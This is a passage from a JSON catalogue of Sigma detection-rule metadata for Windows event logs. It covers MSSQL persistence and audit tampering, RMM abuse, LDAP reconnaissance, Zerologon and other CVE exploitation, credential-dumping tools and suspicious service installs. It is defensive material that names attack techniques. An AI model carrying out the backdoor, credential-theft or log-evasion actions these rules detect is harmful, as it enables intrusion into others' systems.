A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-13", "falsepositive": [ "Legitimate use of the feature by administrators (rare)" ], "filename": "win_mssql_sp_procoption_set.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "value": "MSSQL SPProcoption Set" }, { "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-13", "falsepositive": [ "Rare legitimate administrative activity" ], "filename": "win_mssql_add_sysadmin_account.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", "value": "MSSQL Add Account To Sysadmin Role" }, { "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", "meta": { "author": 
"Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-13", "falsepositive": [ "This event should only fire when an administrator is modifying the audit policy, which should be a rare occurrence once it's set up" ], "filename": "win_mssql_disable_audit_settings.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "value": "MSSQL Disable Audit Settings" }, { "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Unknown" ], "filename": "win_mssql_xp_cmdshell_audit_log.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml" ], "tags": [ "attack.execution" ] }, "uuid": "7f103213-a04e-4d59-8261-213dddf22314", "value": "MSSQL XPCmdshell Suspicious Execution" }, { "description": "Detects failed logon attempts to an MSSQL server from clients with an external network IP address. 
This can be a sign of a bruteforce attack.", "meta": { "author": "j4son", "creation_date": "2023-10-11", "falsepositive": [ "Unknown" ], "filename": "win_mssql_failed_logon_from_external_network.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/", "https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml" ], "tags": [ "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d", "value": "MSSQL Server Failed Logon From External Network" }, { "description": "Detects failed logon attempts from clients to MSSQL server.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), j4son", "creation_date": "2023-10-11", "falsepositive": [ "This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. 
Investigate the source of such events and mitigate them" ], "filename": "win_mssql_failed_logon.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/", "https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon.yml" ], "tags": [ "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "218d2855-2bba-4f61-9c85-81d0ea63ac71", "value": "MSSQL Server Failed Logon" }, { "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-09-01", "falsepositive": [ "Legitimate Atera agent installation" ], "filename": "win_software_atera_rmm_agent_install.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml" ], "tags": [ "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "value": "Atera Agent Installation" }, { "description": "Detects installation of a remote msi file from web.", "meta": { "author": "Stamatis Chatzimangou", "creation_date": "2022-10-23", "falsepositive": [ 
"Unknown" ], "filename": "win_msi_install_from_web.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/_st0pp3r_/status/1583922009842802689", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "value": "MSI Installation From Web" }, { "description": "An application has been removed. Check if it is critical.", "meta": { "author": "frack113", "creation_date": "2022-01-28", "falsepositive": [ "Unknown" ], "filename": "win_builtin_remove_application.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/msi/event-logging", "https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_builtin_remove_application.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", "value": "Application Uninstalled" }, { "description": "Detects MSI package installation from suspicious locations", "meta": { "author": "Nasreddine 
Bencherchali (Nextron Systems)", "creation_date": "2022-08-31", "falsepositive": [ "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use." ], "filename": "win_msi_install_from_susp_locations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", "value": "MSI Installation From Suspicious Locations" }, { "description": "Detects backup catalog deletions", "meta": { "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "creation_date": "2017-05-12", "falsepositive": [ "Unknown" ], "filename": "win_susp_backup_delete.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", "value": "Backup Catalog Deleted" }, { "description": "Detects command execution via ScreenConnect RMM", "meta": { "author": "Ali Alwashali", "creation_date": "2023-10-10", "falsepositive": [ "Legitimate use 
of ScreenConnect" ], "filename": "win_app_remote_access_tools_screenconnect_command_exec.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/pull/4467", "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "076ebe48-cc05-4d8f-9d41-89245cd93a14", "value": "Remote Access Tool - ScreenConnect Command Execution" }, { "description": "Detects file being transferred via ScreenConnect RMM", "meta": { "author": "Ali Alwashali", "creation_date": "2023-10-10", "falsepositive": [ "Legitimate use of ScreenConnect" ], "filename": "win_app_remote_access_tools_screenconnect_file_transfer.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/pull/4467", "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13", "value": "Remote Access Tool - ScreenConnect File Transfer" }, { "description": "Detects potential Active Directory enumeration via LDAP", "meta": { "author": "Adeem Mawani", "creation_date": "2021-06-22", 
"falsepositive": "No established falsepositives", "filename": "win_ldap_recon.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", "https://ipurple.team/2024/07/15/sharphound-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ "attack.discovery", "attack.t1069.002", "attack.t1087.002", "attack.t1482" ] }, "related": [ { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", "value": "Potential Active Directory Reconnaissance/Enumeration Via LDAP" }, { "description": "Detects plugged/unplugged USB devices", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-11-09", "falsepositive": [ "Legitimate administrative activity" ], "filename": "win_usb_device_plugged.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", 
"refs": [ "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" ], "tags": [ "attack.initial-access", "attack.t1200" ] }, "related": [ { "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "value": "USB Device Plugged" }, { "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can make many changes to the object.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Unknown" ], "filename": "win_system_exploit_cve_2021_42287.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", "value": "Potential CVE-2021-42287 Exploitation Attempt" }, { "description": "Detects denied requests by Active Directory Certificate Services.\nExamples of such request denials include issues with permissions on the certificate template or invalid signatures.\n", "meta": { "author": 
"@SerkinValery", "creation_date": "2024-03-07", "falsepositive": [ "Unknown" ], "filename": "win_system_adcs_enrollment_request_denied.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10)", "https://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_certification_authority/win_system_adcs_enrollment_request_denied.yml" ], "tags": [ "attack.credential-access", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "994bfd6d-0a2e-481e-a861-934069fcf5f5", "value": "Active Directory Certificate Services Denied Certificate Enrollment Request" }, { "description": "Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system-like hive name located in the temp directory have been reset.\nThis occurs when an application tries to access a hive and the hive has not been recognized in the last 7 days (by default).\nRegistry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-15", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_critical_hive_location_access_bits_cleared.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kernel_general/win_system_susp_critical_hive_location_access_bits_cleared.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "value": "Critical Hive In Suspicious Location Access Bits Cleared" }, { "description": "Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.", "meta": { "author": "Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-04-26", "falsepositive": [ "Environments that use NTLMv1" ], "filename": "win_system_lsasrv_ntlmv1.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml" ], "tags": [ "attack.defense-evasion", "attack.lateral-movement", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "value": "NTLMv1 Logon Between Client and Server" }, { "description": "Detects Windows update errors including installation failures and connection issues. 
Defenders should observe this in case critical update KBs aren't installed.\n", "meta": { "author": "frack113", "creation_date": "2021-12-04", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_system_update_error.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml" ], "tags": [ "attack.impact", "attack.resource-development", "attack.t1584" ] }, "related": [ { "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "value": "Windows Update Error" }, { "description": "During exploitation of CVE-2021-34484 or CVE-2022-21919 (Windows User Profile Service privilege escalation), two events (Provider_Name: Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 are created; note that these events also occur on ordinary profile corruption, so expect false positives. Moreover, the directory \\Users\\TEMP may be created during exploitation. 
Viewed on 2008 Server", "meta": { "author": "Cybex", "creation_date": "2022-08-16", "falsepositive": [ "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" ], "tags": [ "attack.execution" ] }, "uuid": "52a85084-6989-40c3-8f32-091e12e17692", "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919" }, { "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", "meta": { "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "creation_date": "2020-10-13", "falsepositive": "No established falsepositives", "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", "https://www.secura.com/blog/zero-logon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" ], "tags": [ "attack.t1210", "attack.lateral-movement" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" 
} ], "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", "value": "Zerologon Exploitation Using Well-known Tools" }, { "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", "meta": { "author": "NVISO", "creation_date": "2020-09-15", "falsepositive": [ "Unknown" ], "filename": "win_system_vul_cve_2020_1472.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", "value": "Vulnerable Netlogon Secure Channel Connection Allowed" }, { "description": "Detects well-known credential dumping tools execution via service execution events", "meta": { "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "creation_date": "2017-03-05", "falsepositive": [ "Legitimate Administrator using credential dumping tool for password recovery" ], "filename": "win_system_mal_creddumper.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_mal_creddumper.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1003.001", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005", "attack.t1003.006", 
"attack.t1569.002", "attack.s0005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "value": "Credential Dumping Tools Service Execution - System" }, { "description": "Detects powershell script installed as a Service", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "win_system_powershell_script_installed_as_service.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "value": "PowerShell Scripts 
Installed as Services" }, { "description": "Detects PAExec service installation", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_paexec.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.poweradmin.com/paexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_paexec.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "value": "PAExec Service Installation" }, { "description": "Detects suspicious service installation commands", "meta": { "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-03-18", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_susp.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_susp.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", "value": "Suspicious Service Installation" }, { "description": "Detects the use of smbexec.py tool by detecting a specific service installation", "meta": { "author": "Omer Faruk Celik", "creation_date": "2018-03-20", "falsepositive": [ "Unknown" ], "filename": 
"win_system_hack_smbexec.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60", "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", "https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml" ], "tags": [ "attack.lateral-movement", "attack.execution", "attack.t1021.002", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", "value": "smbexec.py Service Installation" }, { "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "value": "Invoke-Obfuscation Via Use Rundll32 - System" }, { "description": "Detects important or interesting Windows services that got terminated for whatever reason", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-14", "falsepositive": [ "Rare false positives could occur since service termination could happen due to multiple reasons" ], "filename": "win_system_service_terminated_error_important.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml" ], "tags": [ "attack.defense-evasion" ] }, 